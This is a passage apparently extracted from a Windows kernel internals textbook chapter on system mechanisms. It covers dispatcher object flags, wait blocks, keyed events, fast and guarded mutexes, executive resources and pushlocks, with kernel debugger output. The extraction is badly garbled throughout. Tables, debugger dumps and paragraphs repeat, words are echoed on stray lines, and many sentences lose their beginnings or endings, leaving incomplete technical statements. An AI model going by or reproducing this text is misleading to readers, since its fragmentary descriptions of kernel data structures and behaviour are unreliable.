[+0x002 ( 5: 5)] EnergyProfiling : 0x0 [Type: unsigned char]
[+0x002 ( 6: 6)] SchedulerAssist : 0x0 [Type: unsigned char]
[+0x002 ( 7: 7)] ThreadReservedControlFlags : 0x0 [Type: unsigned char]
[+0x003] DebugActive
: 0x0 [Type: unsigned char]
[+0x003 ( 0: 0)] ActiveDR7
: 0x0 [Type: unsigned char]
[+0x003 ( 1: 1)] Instrumented : 0x0 [Type: unsigned char]
[+0x003 ( 2: 2)] Minimal
: 0x0 [Type: unsigned char]
[+0x003 ( 5: 3)] Reserved4
: 0x0 [Type: unsigned char]
[+0x003 ( 6: 6)] UmsScheduled : 0x0 [Type: unsigned char]
[+0x003 ( 7: 7)] UmsPrimary
: 0x0 [Type: unsigned char]
[+0x000] MutantType
: 0x1 [Type: unsigned char]
[+0x001] MutantSize
: 0x0 [Type: unsigned char]
[+0x002] DpcActive
: 0x6 [Type: unsigned char]
[+0x003] MutantReserved : 0x0 [Type: unsigned char]
[+0x004] SignalState
: 0 [Type: long]
[+0x008] WaitListHead [Type: _LIST_ENTRY]
[+0x000] Flink
: 0xffff898f2b3451c0 [Type: _LIST_ENTRY *]
[+0x008] Blink
: 0xffff898f2b3451c0 [Type: _LIST_ENTRY *]
Because this structure is a union, you should ignore any values that do not correspond to the
given object type because they are not relevant to it. Unfortunately, it is not easy to tell which
the objects to which they apply.
TABLE 8-29
Flag
Applies To
Meaning
Type
All dispatcher objects
type of dispatcher object that this is.
Lock
All objects
Used for locking an object during wait operations that need
to modify its state or linkage; actually corresponds to bit 7
(0x80) of the Type
Signaling
Gates
A priority boost should be applied to the woken thread when
the gate is signaled.
Size
Events, Semaphores,
Gates, Processes
Timer2Type
Idle Resilient Timers
Mapping of the Type
Timer2Inserted
Idle Resilient Timers
Set if the timer was inserted into the timer handle table.
Timer2Expiring
Idle Resilient Timers
Set if the timer is undergoing expiration.
Timer2CancelPending
Idle Resilient Timers
Set if the timer is being canceled.
Timer2SetPending
Idle Resilient Timers
Set if the timer is being registered.
Timer2Running
Idle Resilient Timers
Timer2Disabled
Idle Resilient Timers
Set if the timer has been disabled.
192
CHAPTER 8 System mechanisms
Flag
Applies To
Meaning
Timer2ComponentId
Idle Resilient Timers
timer.
Timer2RelativeId
Idle Resilient Timers
its timers this is.
TimerType
Timers
Absolute
Timers
The expiration time is absolute, not relative.
Wake
Timers
This is a wakeable timer, meaning it should exit a standby
state when signaled.
EncodedTolerableDelay
Timers
The maximum amount of tolerance (shifted as a power of
two) that the timer can support when running outside of its
expected periodicity.
Hand
Timers
Index into the timer handle table.
Index
Timers
Index into the timer expiration table.
Inserted
Timers
Set if the timer was inserted into the timer handle table.
Expired
Timers
Set if the timer has already expired.
ThreadType
Threads
Mapping of the Type
ThreadReserved
Threads
Unused.
CycleProfiling
Threads
CounterProfiling
Threads
has been enabled for this thread.
GroupScheduling
Threads
Scheduling groups have been enabled for this thread, such
-
tling.
AffinitySet
Threads
The thread has a CPU Set associated with it.
Tagged
Threads
The thread has been assigned a property tag.
EnergyProfiling
Threads
Energy estimation is enabled for the process that this thread
belongs to.
SchedulerAssist
Threads
The Hyper-V XTS (eXTended Scheduler) is enabled, and this
thread belongs to a virtual processor (VP) thread inside of a
VM minimal process.
Instrumented
Threads
instrumentation callback.
ActiveDR7
Threads
Hardware breakpoints are being used, so DR7 is active and
also sometimes called DebugActive.
Minimal
Threads
This thread belongs to a minimal process.
AltSyscall
Threads
An alternate system call handler has been registered for the
process that owns this thread, such as a Pico Provider or a
Windows CE PAL.
Flag
Applies To
Meaning
Timer2ComponentId
Idle Resilient Timers
timer.
Timer2RelativeId
Idle Resilient Timers
its timers this is.
TimerType
Timers
Absolute
Timers
The expiration time is absolute, not relative.
Wake
Timers
This is a wakeable timer, meaning it should exit a standby
state when signaled.
EncodedTolerableDelay
Timers
The maximum amount of tolerance (shifted as a power of
two) that the timer can support when running outside of its
expected periodicity.
Hand
Timers
Index into the timer handle table.
Index
Timers
Index into the timer expiration table.
Inserted
Timers
Set if the timer was inserted into the timer handle table.
Expired
Timers
Set if the timer has already expired.
ThreadType
Threads
Mapping of the Type
ThreadReserved
Threads
Unused.
CycleProfiling
Threads
CounterProfiling
Threads
has been enabled for this thread.
GroupScheduling
Threads
Scheduling groups have been enabled for this thread, such
-
tling.
AffinitySet
Threads
The thread has a CPU Set associated with it.
Tagged
Threads
The thread has been assigned a property tag.
EnergyProfiling
Threads
Energy estimation is enabled for the process that this thread
belongs to.
SchedulerAssist
Threads
The Hyper-V XTS (eXTended Scheduler) is enabled, and this
thread belongs to a virtual processor (VP) thread inside of a
VM minimal process.
Instrumented
Threads
instrumentation callback.
ActiveDR7
Threads
Hardware breakpoints are being used, so DR7 is active and
also sometimes called DebugActive.
Minimal
Threads
This thread belongs to a minimal process.
AltSyscall
Threads
An alternate system call handler has been registered for the
process that owns this thread, such as a Pico Provider or a
Windows CE PAL.
CHAPTER 8 System mechanisms
193
Flag
Applies To
Meaning
UmsScheduled
Threads
This thread is a UMS Worker (scheduled) thread.
UmsPrimary
Threads
This thread is a UMS Scheduler (primary) thread.
MutantType
Mutants
Mapping of the Type
MutantSize
Mutants
Unused.
DpcActive
Mutants
The mutant was acquired during a DPC.
MutantReserved
Mutants
Unused.
QueueType
Queues
Mapping of the Type
Abandoned
Queues
The queue no longer has any threads that are waiting on it.
DisableIncrement
Queues
No priority boost should be given to a thread waking up to
handle a packet on the queue.
SignalState
and the WaitListHead
pointers are identical, this can either mean that there are no threads waiting or that one thread
is waiting on this object. You can tell the difference if the identical pointer happens to be the ad-
lkd> dx (nt!_KWAIT_BLOCK*)0xffff898f2b3451c0
(nt!_KWAIT_BLOCK*)0xffff898f2b3451c0
: 0xffff898f2b3451c0 [Type: _KWAIT_BLOCK *]
[+0x000] WaitListEntry [Type: _LIST_ENTRY]
[+0x010] WaitType
: 0x1 [Type: unsigned char]
[+0x011] BlockState
: 0x4 [Type: unsigned char]
[+0x012] WaitKey
: 0x0 [Type: unsigned short]
[+0x014] SpareLong
: 6066 [Type: long]
[+0x018] Thread : 0xffff898f2b345080 [Type: _KTHREAD *]
[+0x018] NotificationQueue : 0xffff898f2b345080 [Type: _KQUEUE *]
[+0x020] Object
: 0xffff898f2b64ba60 [Type: void *]
[+0x028] SparePtr
: 0x0 [Type: void *]
In this case, the wait type indicates a WaitAny, so we know that there is a thread blocking on
the event, whose pointer we are given. We also see that the wait block is active. Next, we can
lkd> dt nt!_KTHREAD 0xffff898f2b345080 WaitRegister.State WaitIrql WaitMode WaitBlockCount
WaitReason WaitTime
+0x070 WaitRegister
:
+0x000 State
: 0y001
+0x186 WaitIrql
: 0 ''
+0x187 WaitMode
: 1 ''
+0x1b4 WaitTime
: 0x39b38f8
+0x24b WaitBlockCount : 0x1 ''
+0x283 WaitReason
: 0x6 ''
Flag
Applies To
Meaning
UmsScheduled
Threads
This thread is a UMS Worker (scheduled) thread.
UmsPrimary
Threads
This thread is a UMS Scheduler (primary) thread.
MutantType
Mutants
Mapping of the Type
MutantSize
Mutants
Unused.
DpcActive
Mutants
The mutant was acquired during a DPC.
MutantReserved
Mutants
Unused.
QueueType
Queues
Mapping of the Type
Abandoned
Queues
The queue no longer has any threads that are waiting on it.
DisableIncrement
Queues
No priority boost should be given to a thread waking up to
handle a packet on the queue.
SignalState
and the WaitListHead
WaitListHead
WaitListHead
pointers are identical, this can either mean that there are no threads waiting or that one thread
is waiting on this object. You can tell the difference if the identical pointer happens to be the ad-
lkd> dx (nt!_KWAIT_BLOCK*)0xffff898f2b3451c0
(nt!_KWAIT_BLOCK*)0xffff898f2b3451c0
: 0xffff898f2b3451c0 [Type: _KWAIT_BLOCK *]
[+0x000] WaitListEntry [Type: _LIST_ENTRY]
[+0x010] WaitType
: 0x1 [Type: unsigned char]
[+0x011] BlockState
: 0x4 [Type: unsigned char]
[+0x012] WaitKey
: 0x0 [Type: unsigned short]
[+0x014] SpareLong
: 6066 [Type: long]
[+0x018] Thread : 0xffff898f2b345080 [Type: _KTHREAD *]
[+0x018] NotificationQueue : 0xffff898f2b345080 [Type: _KQUEUE *]
[+0x020] Object
: 0xffff898f2b64ba60 [Type: void *]
[+0x028] SparePtr
: 0x0 [Type: void *]
In this case, the wait type indicates a WaitAny, so we know that there is a thread blocking on
WaitAny, so we know that there is a thread blocking on
WaitAny
the event, whose pointer we are given. We also see that the wait block is active. Next, we can
lkd> dt nt!_KTHREAD 0xffff898f2b345080 WaitRegister.State WaitIrql WaitMode WaitBlockCount
WaitReason WaitTime
+0x070 WaitRegister
:
+0x000 State
: 0y001
+0x186 WaitIrql
: 0 ''
+0x187 WaitMode
: 1 ''
+0x1b4 WaitTime
: 0x39b38f8
+0x24b WaitBlockCount : 0x1 ''
+0x283 WaitReason
: 0x6 ''
194
CHAPTER 8 System mechanisms
The data shows that this is a committed wait that was performed at IRQL 0 (Passive Level)
with a wait mode of UserMode, at the time shown in 15 ms clock ticks since boot, with the reason
indicating a user-mode application request. We can also see that this is the only wait block this
thread has, meaning that it is not waiting for any other object.
the second pointer value in the WaitListEntry
!thread on the thread pointer in the wait block) to traverse the list and see what other threads
look at their WaitBlockCount to see how many other wait blocks were present, and simply keep
incrementing the pointer by sizeof(KWAIT_BLOCK).
Another possibility is that the wait type would have been WaitNotification
KQUEUE) structure, which is
itself a dispatcher object. Potentially, it would also have had its own nonempty wait block list, which
would have revealed the wait block associated with the worker thread that will be asynchronously
eventually execute, you would have to dump user-mode thread pool data structures.
Keyed events
A synchronization object called a keyed event bears special mention because of the role it played in
user-mode-exclusive synchronization primitives and the development of the alert-by-ID primitive,
futex in the Linux operating system (a well-
with low-memory situations when using critical sections, which are user-mode synchronization objects
a “key” for which it waits, where the thread wakes when another thread of the same process signals
the event with the same key. As we pointed out, if this sounds familiar to the alerting mechanism, it is
because keyed events were its precursor.
If there was contention, EnterCriticalSection would dynamically allocate an event object, and the
thread wanting to acquire the critical section would wait for the thread that owns the critical section to
signal it in LeaveCriticalSection. Clearly, this introduces a problem during low-memory conditions: criti-
cal section acquisition could fail because the system was unable to allocate the event object required.
In a pathological case, the low-memory condition itself might have been caused by the application try-
the only scenario that could cause this to fail—a less likely scenario was handle exhaustion. If the pro-
cess reached its handle limit, the new handle for the event object could fail.
It might seem that preallocating a global standard event object, similar to the reserve objects we
-
tions, each of which can have its own locking state, this would require an unknown number of preal-
keyed events, however, was
The data shows that this is a committed wait that was performed at IRQL 0 (Passive Level)
with a wait mode of UserMode, at the time shown in 15 ms clock ticks since boot, with the reason
indicating a user-mode application request. We can also see that this is the only wait block this
thread has, meaning that it is not waiting for any other object.
the second pointer value in the WaitListEntry
WaitListEntry
WaitListEntry
!thread on the thread pointer in the wait block) to traverse the list and see what other threads
!thread on the thread pointer in the wait block) to traverse the list and see what other threads
!thread
look at their WaitBlockCount to see how many other wait blocks were present, and simply keep
WaitBlockCount to see how many other wait blocks were present, and simply keep
WaitBlockCount
incrementing the pointer by sizeof(KWAIT_BLOCK).
Another possibility is that the wait type would have been WaitNotification
KQUEUE) structure, which is
itself a dispatcher object. Potentially, it would also have had its own nonempty wait block list, which
would have revealed the wait block associated with the worker thread that will be asynchronously
eventually execute, you would have to dump user-mode thread pool data structures.
CHAPTER 8 System mechanisms
195
that a single event could be reused among different threads, as long as each one provided a different
key to distinguish itself. By providing the virtual address of the critical section itself as the key, this ef-
fectively allows multiple critical sections (and thus, waiters) to use the same keyed event handle, which
can be preallocated at process startup time.
key
critical section). When the owner thread releases the keyed event by signaling it, only a single thread
waiting on the key is woken up (the same behavior as synchronization events, in contrast to notifica-
tion events). Going back to our use case of critical sections using their address as a key, this would im-
ply that each process still needs its own keyed event because virtual addresses are obviously unique
to a single process address space. However, it turns out that the kernel can wake only the waiters in
the current process so that the key is even isolated across processes, meaning that there can be only
a single keyed event object for the entire system.
As such, when EnterCriticalSection called NtWaitForKeyedEvent to perform a wait on the keyed
event, it gave a NULL handle as parameter for the keyed event, telling the kernel that it was unable
to create a keyed event. The kernel recognizes this behavior and uses a global keyed event named
ExpCritSecOutOfMemoryEvent
a named keyed event anymore because the kernel keeps track of the object and its references.
However, keyed events were more than just a fallback object for low-memory conditions. When
multiple waiters are waiting on the same key and need to be woken up, the key is signaled multiple
times, which requires the object to keep a list of all the waiters so that it can perform a “wake” opera-
tion on each of them. (Recall that the result of signaling a keyed event is the same as that of signaling a
synchronization event.) However, a thread can signal a keyed event without any threads on the waiter
list. In this scenario, the signaling thread instead waits on the event itself.
Without this fallback, a signaling thread could signal the keyed event during the time that the user-
mode code saw the keyed event as unsignaled and attempt a wait. The wait might have come after
the signaling thread signaled the keyed event, resulting in a missed pulse, so the waiting thread would
deadlock. By forcing the signaling thread to wait in this scenario, it actually signals the keyed event only
when someone is looking (waiting). This behavior made them similar, but not identical, to the Linux
futex
Slim Read Writer (SRW) Locks.
Note When the keyed-event wait code needs to perform a wait, it uses a built-in sema-
phore located in the kernel-mode thread object (ETHREAD) called KeyedWaitSemaphore.
(This semaphore shares its location with the ALPC wait semaphore.) See Chapter 4 of Part 1
for more information on thread objects.
-
tion. The initial reason, during the Windows XP timeframe, was that keyed events did not offer scalable
performance in heavy-usage scenarios. Recall that all the algorithms described were meant to be used
196
CHAPTER 8 System mechanisms
-
ed to handle. The primary performance bottleneck was that keyed events maintained the list of waiters
described in a doubly linked list. This kind of list has poor traversal speed, meaning the time required
to loop through the list. In this case, this time depended on the number of waiter threads. Because the
object is global, dozens of threads could be on the list, requiring long traversal times every single time
a key was set or waited on.
Note The head of the list is kept in the keyed event object, whereas the threads are linked
through the KeyedWaitChain
LARGE_INTEGER, the same size as a doubly linked list) in the kernel-mode thread object
(ETHREAD). See Chapter 4 of Part 1 for more information on this object.
Windows Vista improved keyed-event performance by using a hash table instead of a linked list
to hold the waiter threads. This optimization is what ultimately allowed Windows to include the three
new lightweight user-mode synchronization primitives (to be discussed shortly) that all depended on
the keyed event. Critical sections, however, continued to use event objects, primarily for application
compatibility and debugging, because the event object and internals are well known and documented,
whereas keyed events are opaque and not exposed to the Win32 API.
With the introduction of the new alerting by Thread ID capabilities in Windows 8, however, this all
changed again, removing the usage of keyed events across the system (save for one situation in init
once
structure eventually dropped its usage of a regular event object and moved toward using this new ca-
pability as well (with an application compatibility shim that can revert to using the original event object
if needed).
Fast mutexes and guarded mutexes
objects because, although they are still built on a dispatcher object—an event—they perform a wait
only if the fast mutex is contended. Unlike a standard mutex, which always attempts the acquisition
through the dispatcher, this gives the fast mutex especially good performance in contended environ-
all kernel-mode
APC (described earlier in this chapter) delivery can be disabled, unlike regular mutex objects that block
only normal
ExAcquireFastMutex and ExAcquireFastMutexUnsafe. The former function blocks all APC delivery by
raising the IRQL of the processor to APC level. The latter, “unsafe” function, expects to be called with
all kernel-mode APC delivery already disabled, which can be done by raising the IRQL to APC level.
ExTryToAcquireFastMutex
recursively, unlike mutex objects.
CHAPTER 8 System mechanisms
197
In Windows 8 and later, guarded mutexes are identical to fast mutexes but are acquired
with KeAcquireGuardedMutex and KeAcquireGuardedMutexUnsafe. Like fast mutexes, a
KeTryToAcquireGuardedMutex method also exists.
Prior to Windows 8, these functions did not disable APCs by raising the IRQL to APC level, but by
-
able APC delivery until the region was exited, as we saw earlier. On older systems with a PIC (which we
also talked about earlier in this chapter), this was faster than touching the IRQL. Additionally, guarded
mutexes used a gate dispatcher object, which was slightly faster than an event—another difference that
is no longer true.
Another problem related to the guarded mutex was the kernel function KeAreApcsDisabled. Prior to
Windows Server 2003, this function indicated whether normal APCs were disabled by checking whether
the code was running inside a critical section. In Windows Server 2003, this function was changed to
indicate whether the code was in a critical or guarded region, changing the functionality to also return
TRUE if special kernel APCs are also disabled.
Because there are certain operations that drivers should not perform when special kernel APCs
are disabled, it made sense to call KeGetCurrentIrql to check whether the IRQL is APC level or not,
which was the only way special kernel APCs could have been disabled. However, with the intro-
duction of guarded regions and guarded mutexes, which were heavily used even by the memory
manager, this check failed because guarded mutexes did not raise IRQL. Drivers then had to call
KeAreAllApcsDisabled for this purpose, which also checked whether special kernel APCs were disabled
false positives, ultimately all led to the decision to simply make guarded mutexes revert to just being
fast mutexes.
Executive resources
Executive resources are a synchronization mechanism that supports shared and exclusive access; like
fast mutexes, they require that all kernel-mode APC delivery be disabled before they are acquired.
They are also built on dispatcher objects that are used only when there is contention. Executive re-
have long-lasting wait periods in which I/O should still be allowed to some extent (such as reads).
Threads waiting to acquire an executive resource for shared access wait for a semaphore associated
with the resource, and threads waiting to acquire an executive resource for exclusive access wait for an
event. A semaphore with unlimited count is used for shared waiters because they can all be woken and
granted access to the resource when an exclusive holder releases the resource simply by signaling the
semaphore. When a thread waits for exclusive access of a resource that is currently owned, it waits on
a synchronization event object because only one of the waiters will wake when the event is signaled. In
the earlier section on synchronization events, it was mentioned that some event unwait operations can
actually cause a priority boost. This scenario occurs when executive resources are used, which is one
reason why they also track ownership like mutexes do. (See Chapter 4 of Part 1 for more information on
the executive resource priority boost.)
198
CHAPTER 8 System mechanisms
acquiring resources: ExAcquireResourceSharedLite, ExAcquireResourceExclusiveLite, ExAcquireShared
StarveExclusive, and ExAcquireShareWaitForExclusive
Recent versions of Windows also added fast executive resources that use identical API names but
add the word “fast,” such as ExAcquireFastResourceExclusive, ExReleaseFastResource, and so on. These
are meant to be faster replacements due to different handling of lock ownership, but no component
EXPERIMENT: Listing acquired executive resources
The kernel debugger !locks
dumps their state. By default, the command lists only executive resources that are currently
owned, but the –d option is documented as listing all executive resources—unfortunately, this
is no longer the case. However, you can still use the -v
resources instead. Here is partial output of the command:
lkd> !locks -v
**** DUMP OF ALL RESOURCE OBJECTS ****
Resource @ nt!ExpFirmwareTableResource (0xfffff8047ee34440) Available
Resource @ nt!PsLoadedModuleResource (0xfffff8047ee48120) Available
Contention Count = 2
Resource @ nt!SepRmDbLock (0xfffff8047ef06350) Available
Contention Count = 93
Resource @ nt!SepRmDbLock (0xfffff8047ef063b8) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06420) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06488) Available
Resource @ nt!SepRmGlobalSaclLock (0xfffff8047ef062b0) Available
Resource @ nt!SepLsaAuditQueueInfo (0xfffff8047ee6e010) Available
Resource @ nt!SepLsaDeletedLogonQueueInfo (0xfffff8047ee6ded0) Available
Resource @ 0xffff898f032a8550 Available
Resource @ nt!PnpRegistryDeviceResource (0xfffff8047ee62b00) Available
Contention Count = 27385
Resource @ nt!PopPolicyLock (0xfffff8047ee458c0) Available
Contention Count = 14
Resource @ 0xffff898f032a8950 Available
Resource @ 0xffff898f032a82d0 Available
Note that the contention count, which is extracted from the resource structure, records
the number of times threads have tried to acquire the resource and had to wait because it was
already owned. On a live system where you break in with the debugger, you might be lucky
enough to catch a few held resources, as shown in the following output:
2: kd> !locks
**** DUMP OF ALL RESOURCE OBJECTS ****
KD: Scanning for held locks.....
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
EXPERIMENT: Listing acquired executive resources
The kernel debugger !locks
dumps their state. By default, the command lists only executive resources that are currently
owned, but the –d option is documented as listing all executive resources—unfortunately, this
is no longer the case. However, you can still use the -v
resources instead. Here is partial output of the command:
lkd> !locks -v
**** DUMP OF ALL RESOURCE OBJECTS ****
Resource @ nt!ExpFirmwareTableResource (0xfffff8047ee34440) Available
Resource @ nt!PsLoadedModuleResource (0xfffff8047ee48120) Available
Contention Count = 2
Resource @ nt!SepRmDbLock (0xfffff8047ef06350) Available
Contention Count = 93
Resource @ nt!SepRmDbLock (0xfffff8047ef063b8) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06420) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06488) Available
Resource @ nt!SepRmGlobalSaclLock (0xfffff8047ef062b0) Available
Resource @ nt!SepLsaAuditQueueInfo (0xfffff8047ee6e010) Available
Resource @ nt!SepLsaDeletedLogonQueueInfo (0xfffff8047ee6ded0) Available
Resource @ 0xffff898f032a8550 Available
Resource @ nt!PnpRegistryDeviceResource (0xfffff8047ee62b00) Available
Contention Count = 27385
Resource @ nt!PopPolicyLock (0xfffff8047ee458c0) Available
Contention Count = 14
Resource @ 0xffff898f032a8950 Available
Resource @ 0xffff898f032a82d0 Available
Note that the contention count, which is extracted from the resource structure, records
the number of times threads have tried to acquire the resource and had to wait because it was
already owned. On a live system where you break in with the debugger, you might be lucky
enough to catch a few held resources, as shown in the following output:
2: kd> !locks
**** DUMP OF ALL RESOURCE OBJECTS ****
KD: Scanning for held locks.....
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
CHAPTER 8 System mechanisms
199
KD: Scanning for held locks....
Resource @ 0xffffde07a2bfb350 Shared 1 owning threads
Contention Count = 2
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks...........................................................
Resource @ 0xffffde07a8070c00 Shared 1 owning threads
Threads: ffffde07aa3f1083-01<*> *** Actual Thread ffffde07aa3f1080
KD: Scanning for held locks...........................................................
Resource @ 0xffffde07a8995900 Exclusively owned
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks...........................................................
9706 total locks, 4 locks currently held
resource and any threads that are waiting for the resource, by specifying the –v switch and the
2: kd> !locks -v 0xffffde07a33d6a28
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
THREAD ffffde07a9374080 Cid 0544.1494 Teb: 000000ed8de12000
Win32Thread: 0000000000000000 WAIT: (Executive) KernelMode Non-Alertable
ffff8287943a87b8 NotificationEvent
IRP List:
ffffde07a936da20: (0006,0478) Flags: 00020043 Mdl: ffffde07a8a75950
ffffde07a894fa20: (0006,0478) Flags: 00000884 Mdl: 00000000
Not impersonating
DeviceMap
ffff8786fce35840
Owning Process
ffffde07a7f990c0
Image:
svchost.exe
Attached Process
N/A
Image:
N/A
Wait Start TickCount
3649
Ticks: 0
Context Switch Count
31
IdealProcessor: 1
UserTime 00:00:00.015
KernelTime 00:00:00.000
Win32 Start Address 0x00007ff926812390
Stack Init ffff8287943aa650 Current ffff8287943a8030
Base ffff8287943ab000 Limit ffff8287943a4000 Call 0000000000000000
Priority 7 BasePriority 6 PriorityDecrement 0 IoPriority 0 PagePriority 1
Child-SP
RetAddr
Call Site
ffff8287`943a8070 fffff801`104a423a nt!KiSwapContext+0x76
ffff8287`943a81b0 fffff801`104a5d53 nt!KiSwapThread+0x5ba
ffff8287`943a8270 fffff801`104a6579 nt!KiCommitThreadWait+0x153
ffff8287`943a8310 fffff801`1263e962 nt!KeWaitForSingleObject+0x239
ffff8287`943a8400 fffff801`1263d682 Ntfs!NtfsNonCachedIo+0xa52
ffff8287`943a86b0 fffff801`1263b756 Ntfs!NtfsCommonRead+0x1d52
ffff8287`943a8850 fffff801`1049a725 Ntfs!NtfsFsdRead+0x396
ffff8287`943a8920 fffff801`11826591 nt!IofCallDriver+0x55
KD: Scanning for held locks....
Resource @ 0xffffde07a2bfb350 Shared 1 owning threads
Contention Count = 2
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks...........................................................
Resource @ 0xffffde07a8070c00 Shared 1 owning threads
Threads: ffffde07aa3f1083-01<*> *** Actual Thread ffffde07aa3f1080
KD: Scanning for held locks...........................................................
Resource @ 0xffffde07a8995900 Exclusively owned
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks...........................................................
9706 total locks, 4 locks currently held
resource and any threads that are waiting for the resource, by specifying the –v switch and the
2: kd> !locks -v 0xffffde07a33d6a28
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
THREAD ffffde07a9374080 Cid 0544.1494 Teb: 000000ed8de12000
Win32Thread: 0000000000000000 WAIT: (Executive) KernelMode Non-Alertable
ffff8287943a87b8 NotificationEvent
IRP List:
ffffde07a936da20: (0006,0478) Flags: 00020043 Mdl: ffffde07a8a75950
ffffde07a894fa20: (0006,0478) Flags: 00000884 Mdl: 00000000
Not impersonating
DeviceMap
ffff8786fce35840
Owning Process
ffffde07a7f990c0
Image:
svchost.exe
Attached Process
N/A
Image:
N/A
Wait Start TickCount
3649
Ticks: 0
Context Switch Count
31
IdealProcessor: 1
UserTime 00:00:00.015
KernelTime 00:00:00.000
Win32 Start Address 0x00007ff926812390
Stack Init ffff8287943aa650 Current ffff8287943a8030
Base ffff8287943ab000 Limit ffff8287943a4000 Call 0000000000000000
Priority 7 BasePriority 6 PriorityDecrement 0 IoPriority 0 PagePriority 1
Child-SP
RetAddr
Call Site
ffff8287`943a8070 fffff801`104a423a nt!KiSwapContext+0x76
ffff8287`943a81b0 fffff801`104a5d53 nt!KiSwapThread+0x5ba
ffff8287`943a8270 fffff801`104a6579 nt!KiCommitThreadWait+0x153
ffff8287`943a8310 fffff801`1263e962 nt!KeWaitForSingleObject+0x239
ffff8287`943a8400 fffff801`1263d682 Ntfs!NtfsNonCachedIo+0xa52
ffff8287`943a86b0 fffff801`1263b756 Ntfs!NtfsCommonRead+0x1d52
ffff8287`943a8850 fffff801`1049a725 Ntfs!NtfsFsdRead+0x396
ffff8287`943a8920 fffff801`11826591 nt!IofCallDriver+0x55
200
CHAPTER 8 System mechanisms
Pushlocks
Pushlocks are another optimized synchronization mechanism built on event objects; like fast and
-
tages over them, however, in that they can also be acquired in shared or exclusive mode, just like an
executive resource. Unlike the latter, however, they provide an additional advantage due to their size:
a resource object is 104 bytes, but a pushlock is pointer sized. Because of this, pushlocks do not require
allocation nor initialization and are guaranteed to work in low-memory conditions. Many components
inside of the kernel moved away from executive resources to pushlocks, and modern third-party driv-
ers all use pushlocks as well.
There are four types of pushlocks: normal, cache-aware, auto-expand, and address-based. Normal
pushlocks require only the size of a pointer in storage (4 bytes on 32-bit systems, and 8 bytes on 64-bit
systems). When a thread acquires a normal pushlock, the pushlock code marks the pushlock as owned
if it is not currently owned. If the pushlock is owned exclusively or the thread wants to acquire the
thread exclusively and the pushlock is owned on a shared basis, the thread allocates a wait block on
associated with the pushlock. When a thread releases a pushlock, the thread wakes a waiter, if any are
Because a pushlock is only pointer-sized, it actually contains a variety of bits to describe its state.
The meaning of those bits changes as the pushlock changes from being contended to noncontended.
In its initial state, the pushlock contains the following structure:
I
One lock bit, set to 1 if the lock is acquired
I
One waiting bit, set to 1 if the lock is contended and someone is waiting on it
I
optimized
I
One multiple shared bit, set to 1 if the pushlock is shared and currently acquired by more than
one thread
I
28 (on 32-bit Windows) or 60 (on 64-bit Windows) share count bits, containing the number of
threads that have acquired the pushlock
As discussed previously, when a thread acquires a pushlock exclusively while the pushlock is already
acquired by either multiple readers or a writer, the kernel allocates a pushlock wait block. The structure
of the pushlock value itself changes. The share count bits now become the pointer to the wait block.
-
tive to force it to be 16-byte aligned, the bottom 4 bits of any pushlock wait-block structure will be all
zeros. Therefore, those bits are ignored for the purposes of pointer dereferencing; instead, the 4 bits
shown earlier are combined with the pointer value. Because this alignment removes the share count
bits, the share count is now stored in the wait block instead.
A cache-aware pushlock adds layers to the normal (basic) pushlock by allocating a pushlock for each
processor in the system and associating it with the cache-aware pushlock. When a thread wants to
CHAPTER 8 System mechanisms
201
acquire a cache-aware pushlock for shared access, it simply acquires the pushlock allocated for its cur-
rent processor in shared mode; to acquire a cache-aware pushlock exclusively, the thread acquires the
pushlock for each processor in exclusive mode.
As you can imagine, however, with Windows now supporting systems of up to 2560 processors, the
number of potential cache-padded slots in the cache-aware pushlock would require immense fixed al-
locations, even on systems with few processors. Support for dynamic hot-add of processors makes the
problem even harder because it would technically require the preallocation of all 2560 slots ahead of
time, creating multi-KB lock structures. To solve this, modern versions of Windows also implement the
auto-expand push lock. As the name suggests, this type of cache-aware pushlock can dynamically grow
the number of cache slots as needed, both based on contention and processor count, while guarantee-
ing forward progress, leveraging the executive’s slot allocator, which pre-reserves paged or nonpaged
pool (depending on flags that were passed in when allocating the auto-expand pushlock).
Unfortunately for third-party developers, cache-aware (and their newer cousins, auto-expand)
pushlocks are not officially documented for use, although certain data structures, such as FCB Headers in
Windows 10 21H1 and later, do opaquely use them (more information about the FCB structure is available
in Chapter 11.) Internal parts of the kernel in which auto-expand pushlocks are used include the memory
manager, where they are used to protect Address Windowing Extension (AWE) data structures.
Finally, another kind of nondocumented, but exported, push-lock is the address-based pushlock,
which rounds out the implementation with a mechanism similar to the address-based wait we’ll shortly
see in user mode. Other than being a different “kind” of pushlock, the address-based pushlock refers
more to the interface behind its usage. On one end, a caller uses ExBlockOnAddressPushLock, passing
in a pushlock, the virtual address of some variable of interest, the size of the variable (up to 8 bytes),
and a comparison address containing the expected, or desired, value of the variable. If the variable
does not currently have the expected value, a wait is initialized with ExTimedWaitForUnblockPushLock.
This behaves similarly to contended pushlock acquisition, with the difference that a timeout value can
be specified. On the other end, a caller uses ExUnblockOnAddressPushLockEx after making a change
to an address that is being monitored to signal a waiter that the value has changed. This technique
is especially useful when dealing with changes to data protected by a lock or interlocked operation,
so that racing readers can wait for the writer’s notification that their change is complete, outside of a
lock. Other than a much smaller memory footprint, one of the large advantages that pushlocks have
over executive resources is that in the noncontended case they do not require lengthy accounting and
integer operations to perform acquisition or release. By being as small as a pointer, the kernel can use
atomic CPU instructions to perform these tasks. (For example, on x86 and x64 processors, lock cmpxchg
is used, which atomically compares and exchanges the old lock with a new lock.) If the atomic compare
and exchange fails, the lock contains values the caller did not expect (callers usually expect the lock to
be unused or acquired as shared), and a call is then made to the more complex contended version.
To improve performance even further, the kernel exposes the pushlock functionality as inline
functions, meaning that no function calls are ever generated during noncontended acquisition—the
assembly code is directly inserted in each function. This increases code size slightly, but it avoids the
slowness of a function call. Finally, pushlocks use several algorithmic tricks to avoid lock convoys (a
